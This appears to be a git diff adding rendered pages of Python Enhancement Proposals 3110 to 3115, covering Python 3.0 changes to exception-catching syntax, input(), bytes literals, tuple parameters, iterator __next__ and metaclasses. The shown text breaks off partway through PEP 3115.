PEP 3110 – Catching Exceptions in Python 3000 | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3110 – Catching Exceptions in Python 3000

+
+
Author:
+
Collin Winter <collinwinter at google.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Jan-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces changes intended to help eliminate ambiguities +in Python’s grammar, simplify exception classes, simplify garbage +collection for exceptions and reduce the size of the language in +Python 3.0.

+
+
+

Rationale

+
    +
  1. except clauses in Python 2.x present a syntactic ambiguity +where the parser cannot differentiate whether
    except <expression>, <expression>:
    +
    +
    +

    should be interpreted as

    +
    except <type>, <type>:
    +
    +
    +

    or

    +
    except <type>, <name>:
    +
    +
    +

    Python 2 opts for the latter semantic, at the cost of requiring the +former to be parenthesized, like so

    +
    except (<type>, <type>):
    +
    +
    +
  2. +
  3. As specified in PEP 352, the ability to treat exceptions +as tuples will be removed, meaning this code will no longer work
    except os.error, (errno, errstr):
    +
    +
    +

    Because the automatic unpacking will no longer be possible, it is +desirable to remove the ability to use tuples as except targets.

    +
  4. +
  5. As specified in PEP 344, exception instances in Python 3 will possess a __traceback__ attribute. The Open Issues section of that PEP includes a paragraph on garbage collection difficulties caused by this attribute, namely an “exception -> traceback -> stack frame -> exception” reference cycle, whereby all locals are kept in scope until the next GC run. This PEP intends to resolve this issue by adding a cleanup semantic to except clauses in Python 3 whereby the target name is deleted at the end of the except suite.
  6. +
  7. In the spirit of “there should be one – and preferably only one +– obvious way to do it”, it is desirable to consolidate +duplicate functionality. To this end, the exc_value, +exc_type and exc_traceback attributes of the sys +module [1] will be removed in favor of +sys.exc_info(), which provides the same information. These +attributes are already listed in PEP 3100 as targeted +for removal.
  8. +
+
+
+

Grammar Changes

+

In Python 3, the grammar for except statements will change +from [4]

+
except_clause: 'except' [test [',' test]]
+
+
+

to

+
except_clause: 'except' [test ['as' NAME]]
+
+
+

The use of as in place of the comma token means that

+
except (AttributeError, os.error):
+
+
+

can be clearly understood as a tuple of exception classes. This new +syntax was first proposed by Greg Ewing [2] and +endorsed ([2], [3]) by the BDFL.

+

Further, the restriction of the token following as from test +to NAME means that only valid identifiers can be used as +except targets.

+

Note that the grammar above always requires parenthesized tuples as +exception classes. That way, the ambiguous

+
except A, B:
+
+
+

which would mean different things in Python 2.x and 3.x – leading to +hard-to-catch bugs – cannot legally occur in 3.x code.

+
+
+

Semantic Changes

+

In order to resolve the garbage collection issue related to PEP 344, +except statements in Python 3 will generate additional bytecode to +delete the target, thus eliminating the reference cycle. +The source-to-source translation, as suggested by Phillip J. Eby +[5], is

+
try:
+    try_body
+except E as N:
+    except_body
+...
+
+
+

gets translated to (in Python 2.5 terms)

+
try:
+    try_body
+except E, N:
+    try:
+        except_body
+    finally:
+        N = None
+        del N
+...
+
+
+

An implementation has already been checked into the py3k (formerly +“p3yk”) branch [6].

+
+
+

Compatibility Issues

+

Nearly all except clauses will need to be changed. except +clauses with identifier targets will be converted from

+
except E, N:
+
+
+

to

+
except E as N:
+
+
+

except clauses with non-tuple, non-identifier targets +(e.g., a.b.c[d]) will need to be converted from

+
except E, T:
+
+
+

to

+
except E as t:
+    T = t
+
+
+

Both of these cases can be handled by Guido van Rossum’s 2to3 +utility [7] using the except fixer [8].

+

except clauses with tuple targets will need to be converted +manually, on a case-by-case basis. These changes will usually need +to be accompanied by changes to the exception classes themselves. +While these changes generally cannot be automated, the 2to3 +utility is able to point out cases where the target of an except +clause is a tuple, simplifying conversion.

+

Situations where it is necessary to keep an exception instance around +past the end of the except suite can be easily translated like so

+
try:
+    ...
+except E as N:
+    ...
+...
+
+
+

becomes

+
try:
+    ...
+except E as N:
+    n = N
+    ...
+...
+
+
+

This way, when N is deleted at the end of the block, n will +persist and can be used as normal.
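The deletion side of this semantic can be seen directly (a minimal Python 3 sketch):

try:
    1 / 0
except ZeroDivisionError as exc:
    saved = exc        # rebind before the suite ends, as shown above
print(saved)           # fine: 'saved' survives the except suite
print(exc)             # NameError: 'exc' was deleted when the suite ended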

+

Lastly, all uses of the sys module’s exc_type, exc_value +and exc_traceback attributes will need to be removed. They can be +replaced with sys.exc_info()[0], sys.exc_info()[1] and +sys.exc_info()[2] respectively, a transformation that can be +performed by 2to3’s sysexcattrs fixer.

+
+

2.6 - 3.0 Compatibility

+

In order to facilitate forwards compatibility between Python 2.6 and 3.0, +the except ... as ...: syntax will be backported to the 2.x series. The +grammar will thus change from:

+
except_clause: 'except' [test [',' test]]
+
+
+

to:

+
except_clause: 'except' [test [('as' | ',') test]]
+
+
+

The end-of-suite cleanup semantic for except statements will not be +included in the 2.x series of releases.
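In other words, Python 2.6 accepts both spellings (a short sketch; the comma form remains invalid in 3.0):

# Both are valid in Python 2.6:
try:
    pass
except ValueError, e:      # legacy 2.x comma form
    pass

try:
    pass
except ValueError as e:    # forward-compatible 3.0 form
    pass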

+
+
+
+

Open Issues

+
+

Replacing or Dropping “sys.exc_info()”

+

The idea of dropping sys.exc_info() or replacing it with a +sys.exception attribute or a sys.get_exception() function +has been raised several times on python-3000 ([9], +[10]) and mentioned in PEP 344’s “Open Issues” section.

+

While a 2to3 fixer to replace calls to sys.exc_info() +and some attribute accesses would be trivial, it would be far more +difficult for static analysis to find and fix functions that expect +the values from sys.exc_info() as arguments. Similarly, this does +not address the need to rewrite the documentation for all APIs that +are defined in terms of sys.exc_info().

+
+
+
+

Implementation

+

This PEP was implemented in revisions 53342 [11] and 53349 +[12]. Support for the new except syntax in 2.6 was +implemented in revision 55446 [13].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3110.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-3111/index.html b/pep-3111/index.html
new file mode 100644
index 00000000000..ec56aea7631
--- /dev/null
+++ b/pep-3111/index.html
@@ -0,0 +1,268 @@
PEP 3111 – Simple input built-in in Python 3000 | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3111 – Simple input built-in in Python 3000

+
+
Author:
+
Andre Roberge <andre.roberge at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Sep-2006
+
Python-Version:
+
3.0
+
Post-History:
+
22-Dec-2006
+
+
+
+
Table of Contents +
+
+

Abstract

+

Input and output are core features of computer programs. Currently, +Python provides a simple means of output through the print keyword +and two simple means of interactive input through the input() +and raw_input() built-in functions.

+

Python 3.0 will introduce various incompatible changes with previous +Python versions (PEP 3100). +Among the proposed changes, print will become a built-in +function, print(), while input() and raw_input() would be removed completely +from the built-in namespace, requiring importing some module to provide +even the most basic input capability.

+

This PEP proposes that Python 3.0 retains some simple interactive user +input capability, equivalent to raw_input(), within the built-in namespace.

+

It was accepted by the BDFL in December 2006 [5].

+
+
+

Motivation

+

With its easy readability and its support for many programming styles +(e.g. procedural, object-oriented, etc.) among others, Python is perhaps +the best computer language to use in introductory programming classes. +Simple programs often need to provide information to the user (output) +and to obtain information from the user (interactive input). +Any computer language intended to be used in an educational setting should +provide straightforward methods for both output and interactive input.

+

The current proposals for Python 3.0 +include a simple output pathway +via a built-in function named print(), but a more complicated method for +input [e.g. via sys.stdin.readline()], one that requires importing an external +module. Current versions of Python (pre-3.0) include raw_input() as a +built-in function. With the availability of such a function, programs that +require simple input/output can be written from day one, without requiring +discussions of importing modules, streams, etc.

+
+
+

Rationale

+

Current built-in functions, like input() and raw_input(), are found to be +extremely useful in traditional teaching settings. (For more details, +see [2] and the discussion that followed.) +While the BDFL has clearly stated [3] that input() was not to be kept in +Python 3000, he has also stated that he was not against revising the +decision of killing raw_input().

+

raw_input() provides a simple means to ask a question and obtain a response from a user. The proposed plans for Python 3.0 would require the replacement of the single statement:

+
name = raw_input("What is your name?")
+
+
+

by the more complicated:

+
import sys
+print("What is your name?")
+name = sys.stdin.readline()
+
+
+

However, from the point of view of many Python beginners and educators, the +use of sys.stdin.readline() presents the following problems:

+

1. Compared to the name “raw_input”, the name “sys.stdin.readline()” +is clunky and inelegant.

+

2. The names “sys” and “stdin” have no meaning for most beginners, who are mainly interested in what the function does, and not where in the package structure it is located. The lack of meaning also makes it difficult to remember: is it “sys.stdin.readline()” or “stdin.sys.readline()”? To a programming novice, there is no obvious reason to prefer one over the other. In contrast, functions with simple and direct names like print, input, raw_input, and open are easier to remember.

+

3. The use of “.” notation is unmotivated and confusing to many beginners. +For example, it may lead some beginners to think “.” is a standard +character that could be used in any identifier.

+

4. There is an asymmetry with the print function: why is print not called +sys.stdout.print()?

+
+
+

Specification

+

The existing raw_input() function will be renamed to input().

+

The Python 2 to 3 conversion tool will replace calls to input() with +eval(input()) and raw_input() with input().
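A sketch of what the conversion produces (prompt strings here are illustrative):

# Python 2 source:
#     name = raw_input("What is your name? ")
#     age = input("What is your age? ")
# Equivalent Python 3 source after conversion:
name = input("What is your name? ")
age = eval(input("What is your age? "))  # eval() preserves old input() semantics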

+
+
+

Naming Discussion

+

With input() effectively removed from the language, +the name raw_input() makes much less sense and alternatives should be +considered. The various possibilities mentioned in various forums include:

+
ask()
+ask_user()
+get_string()
+input()  # initially rejected by BDFL, later accepted
+prompt()
+read()
+user_input()
+get_response()
+
+
+

While it was initially rejected by the BDFL, it has been suggested that the +most direct solution would be to rename “raw_input” to “input” in Python 3000. +The main objection is that Python 2.x already has a function named “input”, +and, even though it is not going to be included in Python 3000, +having a built-in function with the same name but different semantics may +confuse programmers migrating from 2.x to 3000. Certainly, this is no problem +for beginners, and the scope of the problem is unclear for more experienced +programmers, since raw_input(), while popular with many, is not in +universal use. In this instance, the good it does for beginners could be +seen to outweigh the harm it does to experienced programmers - +although it could cause confusion for people reading older books or tutorials.

+

The rationale for accepting the renaming can be found here [4].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3111.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-3112/index.html b/pep-3112/index.html
new file mode 100644
index 00000000000..4ef4d6a6c55
--- /dev/null
+++ b/pep-3112/index.html
@@ -0,0 +1,272 @@
PEP 3112 – Bytes literals in Python 3000 | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3112 – Bytes literals in Python 3000

+
+
Author:
+
Jason Orendorff <jason.orendorff at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Requires:
+
358
+
Created:
+
23-Feb-2007
+
Python-Version:
+
3.0
+
Post-History:
+
23-Feb-2007
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a literal syntax for the bytes objects +introduced in PEP 358. The purpose is to provide a convenient way to +spell ASCII strings and arbitrary binary data.

+
+
+

Motivation

+

Existing spellings of an ASCII string in Python 3000 include:

+
bytes('Hello world', 'ascii')
+'Hello world'.encode('ascii')
+
+
+

The proposed syntax is:

+
b'Hello world'
+
+
+

Existing spellings of an 8-bit binary sequence in Python 3000 include:

+
bytes([0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00])
+bytes('\x7fELF\x01\x01\x01\0', 'latin-1')
+'7f454c4601010100'.decode('hex')
+
+
+

The proposed syntax is:

+
b'\x7f\x45\x4c\x46\x01\x01\x01\x00'
+b'\x7fELF\x01\x01\x01\0'
+
+
+

In both cases, the advantages of the new syntax are brevity, some +small efficiency gain, and the detection of encoding errors at compile +time rather than at runtime. The brevity benefit is especially felt +when using the string-like methods of bytes objects:

+
lines = bdata.split(bytes('\n', 'ascii'))  # existing syntax
+lines = bdata.split(b'\n')  # proposed syntax
+
+
+

And when converting code from Python 2.x to Python 3000:

+
sok.send('EXIT\r\n')  # Python 2.x
+sok.send('EXIT\r\n'.encode('ascii'))  # Python 3000 existing
+sok.send(b'EXIT\r\n')  # proposed
+
+
+
+
+

Grammar Changes

+

The proposed syntax is an extension of the existing string +syntax [1].

+

The new syntax for strings, including the new bytes literal, is:

+
stringliteral: [stringprefix] (shortstring | longstring)
+stringprefix: "b" | "r" | "br" | "B" | "R" | "BR" | "Br" | "bR"
+shortstring: "'" shortstringitem* "'" | '"' shortstringitem* '"'
+longstring: "'''" longstringitem* "'''" | '"""' longstringitem* '"""'
+shortstringitem: shortstringchar | escapeseq
+longstringitem: longstringchar | escapeseq
+shortstringchar:
+  <any source character except "\" or newline or the quote>
+longstringchar: <any source character except "\">
+escapeseq: "\" NL
+  | "\\" | "\'" | '\"'
+  | "\a" | "\b" | "\f" | "\n" | "\r" | "\t" | "\v"
+  | "\ooo" | "\xhh"
+  | "\uxxxx" | "\Uxxxxxxxx" | "\N{name}"
+
+
+

The following additional restrictions apply only to bytes literals +(stringliteral tokens with b or B in the +stringprefix):

+
    +
  • Each shortstringchar or longstringchar must be a character +between 1 and 127 inclusive, regardless of any encoding +declaration [2] in the source file.
  • +
  • The Unicode-specific escape sequences \uxxxx, +\Uxxxxxxxx, and \N{name} are unrecognized in +Python 2.x and forbidden in Python 3000.
  • +
+

Adjacent bytes literals are subject to the same concatenation rules as +adjacent string literals [3]. A bytes literal adjacent to a +string literal is an error.
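For example (assuming Python 3 semantics; the value shown is illustrative):

header = b'GIF8' b'9a'    # adjacent bytes literals concatenate: b'GIF89a'
# bad = b'GIF8' '9a'      # SyntaxError: bytes literal adjacent to a string literal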

+
+
+

Semantics

+

Each evaluation of a bytes literal produces a new bytes object. +The bytes in the new object are the bytes represented by the +shortstringitem or longstringitem parts of the literal, in the +same order.

+
+
+

Rationale

+

The proposed syntax provides a cleaner migration path from Python 2.x +to Python 3000 for most code involving 8-bit strings. Preserving the +old 8-bit meaning of a string literal is usually as simple as adding a +b prefix. The one exception is Python 2.x strings containing +bytes >127, which must be rewritten using escape sequences. +Transcoding a source file from one encoding to another, and fixing up +the encoding declaration, should preserve the meaning of the program. +Python 2.x non-Unicode strings violate this principle; Python 3000 +bytes literals shouldn’t.

+

A string literal with a b in the prefix is always a syntax error +in Python 2.5, so this syntax can be introduced in Python 2.6, along +with the bytes type.

+

A bytes literal produces a new object each time it is evaluated, like +list displays and unlike string literals. This is necessary because +bytes literals, like lists and unlike strings, are +mutable [4].

+
+
+

Reference Implementation

+

Thomas Wouters has checked an implementation into the Py3K branch, +r53872.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3112.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-3113/index.html b/pep-3113/index.html
new file mode 100644
index 00000000000..9c62e88a49a
--- /dev/null
+++ b/pep-3113/index.html
@@ -0,0 +1,387 @@
PEP 3113 – Removal of Tuple Parameter Unpacking | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3113 – Removal of Tuple Parameter Unpacking

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
02-Mar-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Tuple parameter unpacking is the use of a tuple as a parameter in a +function signature so as to have a sequence argument automatically +unpacked. An example is:

+
def fxn(a, (b, c), d):
+    pass
+
+
+

The use of (b, c) in the signature requires that the second +argument to the function be a sequence of length two (e.g., +[42, -13]). When such a sequence is passed it is unpacked and +has its values assigned to the parameters, just as if the statement +b, c = [42, -13] had been executed in the parameter.

+

Unfortunately this feature of Python’s rich function signature +abilities, while handy in some situations, causes more issues than +they are worth. Thus this PEP proposes their removal from the +language in Python 3.0.

+
+
+

Why They Should Go

+
+

Introspection Issues

+

Python has very powerful introspection capabilities. These extend to +function signatures. There are no hidden details as to what a +function’s call signature is. In general it is fairly easy to figure +out various details about a function’s signature by viewing the +function object and various attributes on it (including the function’s +func_code attribute).

+

But there is great difficulty when it comes to tuple parameters. The +existence of a tuple parameter is denoted by its name being made of a +. and a number in the co_varnames attribute of the function’s +code object. This allows the tuple argument to be bound to a name +that only the bytecode is aware of and cannot be typed in Python +source. But this does not specify the format of the tuple: its +length, whether there are nested tuples, etc.

+

In order to get all of the details about the tuple from the function +one must analyse the bytecode of the function. This is because the +first bytecode in the function literally translates into the tuple +argument being unpacked. Assuming the tuple parameter is +named .1 and is expected to unpack to variables spam and +monty (meaning it is the tuple (spam, monty)), the first +bytecode in the function will be for the statement +spam, monty = .1. This means that to know all of the details of +the tuple parameter one must look at the initial bytecode of the +function to detect tuple unpacking for parameters formatted as +\.\d+ and deduce any and all information about the expected +argument. Bytecode analysis is how the inspect.getargspec +function is able to provide information on tuple parameters. This is +not easy to do and is burdensome on introspection tools as they must +know how Python bytecode works (an otherwise unneeded burden as all +other types of parameters do not require knowledge of Python +bytecode).
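A small Python 2.x sketch of the artifacts described above (tuple parameters are a syntax error in Python 3; output is as typically observed on CPython 2.x):

def fxn(a, (b, c), d):
    pass

print(fxn.func_code.co_varnames)   # ('a', '.1', 'd', 'b', 'c') -- '.1' is the hidden tuple
import inspect
print(inspect.getargspec(fxn))     # args include the nested ['b', 'c'] list,
                                   # recovered by analysing the bytecode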

+

The difficulty of analysing bytecode notwithstanding, there is another issue with the dependency on using Python bytecode. IronPython [3] does not use Python’s bytecode. Because it is based on the .NET framework, it instead stores MSIL [4] in the func_code.co_code attribute of the function. This fact prevents the inspect.getargspec function from working when run under IronPython. It is unknown whether other Python implementations are affected, but it is reasonable to assume they are if the implementation is not just a re-implementation of the Python virtual machine.

+
+
+

No Loss of Abilities If Removed

+

As mentioned in Introspection Issues, to handle tuple parameters +the function’s bytecode starts with the bytecode required to unpack +the argument into the proper parameter names. This means that there +is no special support required to implement tuple parameters and thus +there is no loss of abilities if they were to be removed, only a +possible convenience (which is addressed in +Why They Should (Supposedly) Stay).

+

The example function at the beginning of this PEP could easily be +rewritten as:

+
def fxn(a, b_c, d):
+    b, c = b_c
+    pass
+
+
+

and in no way lose functionality.

+
+
+

Exception To The Rule

+

When looking at the various types of parameters that a Python function +can have, one will notice that tuple parameters tend to be an +exception rather than the rule.

+

Consider PEP 3102 (keyword-only arguments) and PEP 3107 (function +annotations). Both PEPs have been accepted and +introduce new functionality within a function’s signature. And yet +for both PEPs the new feature cannot be applied to tuple parameters as +a whole. PEP 3102 has no support for tuple parameters at all (which +makes sense as there is no way to reference a tuple parameter by +name). PEP 3107 allows annotations for each item within the tuple +(e.g., (x:int, y:int)), but not the whole tuple (e.g., +(x, y):int).

+

The existence of tuple parameters also places sequence objects +separately from mapping objects in a function signature. There is no +way to pass in a mapping object (e.g., a dict) as a parameter and have +it unpack in the same fashion as a sequence does into a tuple +parameter.

+
+
+

Uninformative Error Messages

+

Consider the following function:

+
def fxn((a, b), (c, d)):
+    pass
+
+
+

If called as fxn(1, (2, 3)) one is given the error message +TypeError: unpack non-sequence. This error message in no way +tells you which tuple was not unpacked properly. There is also no +indication that this was a result that occurred because of the +arguments. Other error messages regarding arguments to functions +explicitly state its relation to the signature: +TypeError: fxn() takes exactly 2 arguments (0 given), etc.

+
+
+

Little Usage

+

While an informal poll of the handful of Python programmers I know personally and from the PyCon 2007 sprint indicates a huge majority of people do not know of this feature and the rest just do not use it, some hard numbers are needed to back up the claim that the feature is not heavily used.

+

Iterating over every line in Python’s code repository in the Lib/ +directory using the regular expression ^\s*def\s*\w+\s*\( to +detect function and method definitions there were 22,252 matches in +the trunk.

+

Tacking on .*,\s*\( to find def statements that contained a +tuple parameter, only 41 matches were found. This means that for +def statements, only 0.18% of them seem to use a tuple parameter.

+
+
+
+

Why They Should (Supposedly) Stay

+
+

Practical Use

+

In certain instances tuple parameters can be useful. A common example is code that expects a two-item tuple that represents a Cartesian point. While it is admittedly nice to have the x and y coordinates unpacked for you, the argument is that this small amount of practical usefulness is heavily outweighed by other issues pertaining to tuple parameters. And as shown in No Loss Of Abilities If Removed, their use is purely practical and in no way provides a unique ability that cannot be handled in other ways very easily.

+
+
+

Self-Documentation For Parameters

+

It has been argued that tuple parameters provide a way of +self-documentation for parameters that are expected to be of a certain +sequence format. Using our Cartesian point example from +Practical Use, seeing (x, y) as a parameter in a function makes +it obvious that a tuple of length two is expected as an argument for +that parameter.

+

But Python provides several other ways to document what parameters are for. Documentation strings are meant to provide enough information to explain what arguments are expected. Tuple parameters might tell you the expected length of a sequence argument, but they do not tell you what that data will be used for. One must also read the docstring to know what other arguments are expected if not all parameters are tuple parameters.

+

Function annotations (which do not work with tuple parameters) can +also supply documentation. Because annotations can be of any form, +what was once a tuple parameter can be a single argument parameter +with an annotation of tuple, tuple(2), Cartesian point, +(x, y), etc. Annotations provide great flexibility for +documenting what an argument is expected to be for a parameter, +including being a sequence of a certain length.

+
+
+
+

Transition Plan

+

To transition Python 2.x code to 3.x where tuple parameters are +removed, two steps are suggested. First, the proper warning is to be +emitted when Python’s compiler comes across a tuple parameter in +Python 2.6. This will be treated like any other syntactic change that +is to occur in Python 3.0 compared to Python 2.6.

+

Second, the 2to3 refactoring tool [1] will gain a fixer +[2] for translating tuple parameters to being a single parameter +that is unpacked as the first statement in the function. The name of +the new parameter will be changed. The new parameter will then be +unpacked into the names originally used in the tuple parameter. This +means that the following function:

+
def fxn((a, (b, c))):
+    pass
+
+
+

will be translated into:

+
def fxn(a_b_c):
+    (a, (b, c)) = a_b_c
+    pass
+
+
+

As tuple parameters are used by lambdas because of the single +expression limitation, they must also be supported. This is done by +having the expected sequence argument bound to a single parameter and +then indexing on that parameter:

+
lambda (x, y): x + y
+
+
+

will be translated into:

+
lambda x_y: x_y[0] + x_y[1]
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3113.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-3114/index.html b/pep-3114/index.html
new file mode 100644
index 00000000000..881c045dbc4
--- /dev/null
+++ b/pep-3114/index.html
@@ -0,0 +1,325 @@
PEP 3114 – Renaming iterator.next() to iterator.__next__() | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3114 – Renaming iterator.next() to iterator.__next__()

+
+
Author:
+
Ka-Ping Yee <ping at zesty.ca>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
04-Mar-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

The iterator protocol in Python 2.x consists of two methods: __iter__() called on an iterable object to yield an iterator, and next() called on an iterator object to yield the next item in the sequence. Using a for loop to iterate over an iterable object implicitly calls both of these methods. This PEP proposes that the next method be renamed to __next__, consistent with all the other protocols in Python in which a method is implicitly called as part of a language-level protocol, and that a built-in function named next be introduced to invoke the __next__ method, consistent with the manner in which other protocols are explicitly invoked.

+
+
+

Names With Double Underscores

+

In Python, double underscores before and after a name are used to +distinguish names that belong to the language itself. Attributes and +methods that are implicitly used or created by the interpreter employ +this naming convention; some examples are:

+
    +
  • __file__ - an attribute automatically created by the interpreter
  • +
  • __dict__ - an attribute with special meaning to the interpreter
  • +
  • __init__ - a method implicitly called by the interpreter
  • +
+

Note that this convention applies to methods such as __init__ that +are explicitly defined by the programmer, as well as attributes such as +__file__ that can only be accessed by naming them explicitly, so it +includes names that are used or created by the interpreter.

+

(Not all things that are called “protocols” are made of methods with +double-underscore names. For example, the __contains__ method has +double underscores because the language construct x in y implicitly +calls __contains__. But even though the read method is part of +the file protocol, it does not have double underscores because there is +no language construct that implicitly invokes x.read().)

+

The use of double underscores creates a separate namespace for names +that are part of the Python language definition, so that programmers +are free to create variables, attributes, and methods that start with +letters, without fear of silently colliding with names that have a +language-defined purpose. (Colliding with reserved keywords is still +a concern, but at least this will immediately yield a syntax error.)

+

The naming of the next method on iterators is an exception to +this convention. Code that nowhere contains an explicit call to a +next method can nonetheless be silently affected by the presence +of such a method. Therefore, this PEP proposes that iterators should +have a __next__ method instead of a next method (with no +change in semantics).

+
+
+

Double-Underscore Methods and Built-In Functions

+

The Python language defines several protocols that are implemented or +customized by defining methods with double-underscore names. In each +case, the protocol is provided by an internal method implemented as a +C function in the interpreter. For objects defined in Python, this +C function supports customization by implicitly invoking a Python method +with a double-underscore name (it often does a little bit of additional +work beyond just calling the Python method.)

+

Sometimes the protocol is invoked by a syntactic construct:

+
    +
  • x[y] –> internal tp_getitem –> x.__getitem__(y)
  • +
  • x + y –> internal nb_add –> x.__add__(y)
  • +
  • -x –> internal nb_negative –> x.__neg__()
  • +
+

Sometimes there is no syntactic construct, but it is still useful to be +able to explicitly invoke the protocol. For such cases Python offers a +built-in function of the same name but without the double underscores.

+
    +
  • len(x) –> internal sq_length –> x.__len__()
  • +
  • hash(x) –> internal tp_hash –> x.__hash__()
  • +
  • iter(x) –> internal tp_iter –> x.__iter__()
  • +
+

Following this pattern, the natural way to handle next is to add a +next built-in function that behaves in exactly the same fashion.

+
    +
  • next(x) –> internal tp_iternext –> x.__next__()
  • +
+

Further, it is proposed that the next built-in function accept a +sentinel value as an optional second argument, following the style of +the getattr and iter built-in functions. When called with two +arguments, next catches the StopIteration exception and returns +the sentinel value instead of propagating the exception. This creates +a nice duality between iter and next:

+
+
iter(function, sentinel) <–> next(iterator, sentinel)
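A brief sketch of the proposed spellings (assuming Python 3 semantics; the class is illustrative):

class Countdown:
    def __init__(self, n):
        self.n = n
    def __iter__(self):
        return self
    def __next__(self):            # renamed from 2.x's next()
        if self.n <= 0:
            raise StopIteration
        self.n -= 1
        return self.n + 1

it = Countdown(2)
print(next(it))          # 2 -- the built-in invokes it.__next__()
print(next(it))          # 1
print(next(it, 'done'))  # 'done' -- sentinel returned instead of StopIteration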
+
+
+

Previous Proposals

+

This proposal is not a new idea. The idea proposed here was supported +by the BDFL on python-dev [1] and is even mentioned in the original +iterator PEP, PEP 234:

+
(In retrospect, it might have been better to go for __next__()
+and have a new built-in, next(it), which calls it.__next__().
+But alas, it's too late; this has been deployed in Python 2.2
+since December 2001.)
+
+
+
+
+

Objections

+

There have been a few objections to the addition of more built-ins. +In particular, Martin von Loewis writes [2]:

+
I dislike the introduction of more builtins unless they have a true
+generality (i.e. are likely to be needed in many programs). For this
+one, I think the normal usage of __next__ will be with a for loop, so
+I don't think one would often need an explicit next() invocation.
+
+It is also not true that most protocols are explicitly invoked through
+builtin functions. Instead, most protocols are can be explicitly invoked
+through methods in the operator module. So following tradition, it
+should be operator.next.
+
+...
+
+As an alternative, I propose that object grows a .next() method,
+which calls __next__ by default.
+
+
+
+
+

Transition Plan

+

Two additional transformations will be added to the 2to3 translation +tool [3]:

+
    +
  • Method definitions named next will be renamed to __next__.
  • +
  • Explicit calls to the next method will be replaced with calls +to the built-in next function. For example, x.next() will +become next(x).
  • +
+

Collin Winter looked into the possibility of automatically deciding +whether to perform the second transformation depending on the presence +of a module-level binding to next [4] and found that it would be +“ugly and slow”. Instead, the translation tool will emit warnings +upon detecting such a binding. Collin has proposed warnings for the +following conditions [5]:

+
    +
  • Module-level assignments to next.
  • +
  • Module-level definitions of a function named next.
  • +
  • Module-level imports of the name next.
  • +
  • Assignments to __builtin__.next.
  • +
+
+
+

Approval

+

This PEP was accepted by Guido on March 6, 2007 [6].

+
+
+

Implementation

+

A patch with the necessary changes (except the 2to3 tool) was written +by Georg Brandl and committed as revision 54910.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3114.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-3115/index.html b/pep-3115/index.html
new file mode 100644
index 00000000000..d0af1d970be
--- /dev/null
+++ b/pep-3115/index.html
@@ -0,0 +1,411 @@
PEP 3115 – Metaclasses in Python 3000 | peps.python.org
+
+


+ + +
+
+
+

PEP 3115 – Metaclasses in Python 3000

+
+
Author:
+
Talin <viridia at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
07-Mar-2007
+
Python-Version:
+
3.0
+
Post-History:
+
11-Mar-2007, 14-Mar-2007
+
+
+
+
+
+

Abstract

+

This PEP proposes changing the syntax for declaring metaclasses, +and alters the semantics for how classes with metaclasses are +constructed.

+
+
+

Rationale

+

There are two rationales for this PEP, both of which are somewhat +subtle.

+

The primary reason for changing the way metaclasses work is that +there are a number of interesting use cases that require the +metaclass to get involved earlier in the class construction process +than is currently possible. Currently, the metaclass mechanism is +essentially a post-processing step. With the advent of class +decorators, many of these post-processing chores can be taken over +by the decorator mechanism.

+

In particular, there is an important body of use cases where it +would be useful to preserve the order in which class members are +declared. Ordinary Python objects store their members in a +dictionary, in which ordering is unimportant, and members are +accessed strictly by name. However, Python is often used to +interface with external systems in which the members are organized +according to an implicit ordering. Examples include declaration of C +structs; COM objects; automatic translation of Python classes into +IDL or database schemas, such as is used in an ORM; and so on.

+

In such cases, it would be useful for a Python programmer to specify +such ordering directly using the declaration order of class members. +Currently, such orderings must be specified explicitly, using some +other mechanism (see the ctypes module for an example.)

+

Unfortunately, the current method for declaring a metaclass does +not allow for this, since the ordering information has already been +lost by the time the metaclass comes into play. By allowing the +metaclass to get involved in the class construction process earlier, +the new system allows the ordering or other early artifacts of +construction to be preserved and examined.

+

The proposed metaclass mechanism also supports a number of other +interesting use cases beyond preserving the ordering of declarations. +One use case is to insert symbols into the namespace of the class +body which are only valid during class construction. An example of +this might be “field constructors”, small functions that are used in +the creation of class members. Another interesting possibility is +supporting forward references, i.e. references to Python +symbols that are declared further down in the class body.

+

The other, weaker, rationale is purely cosmetic: The current method +for specifying a metaclass is by assignment to the special variable +__metaclass__, which is considered by some to be aesthetically less +than ideal. Others disagree strongly with that opinion. This PEP +will not address this issue, other than to note it, since aesthetic +debates cannot be resolved via logical proofs.

+
+
+

Specification

+

In the new model, the syntax for specifying a metaclass is via a +keyword argument in the list of base classes:

+
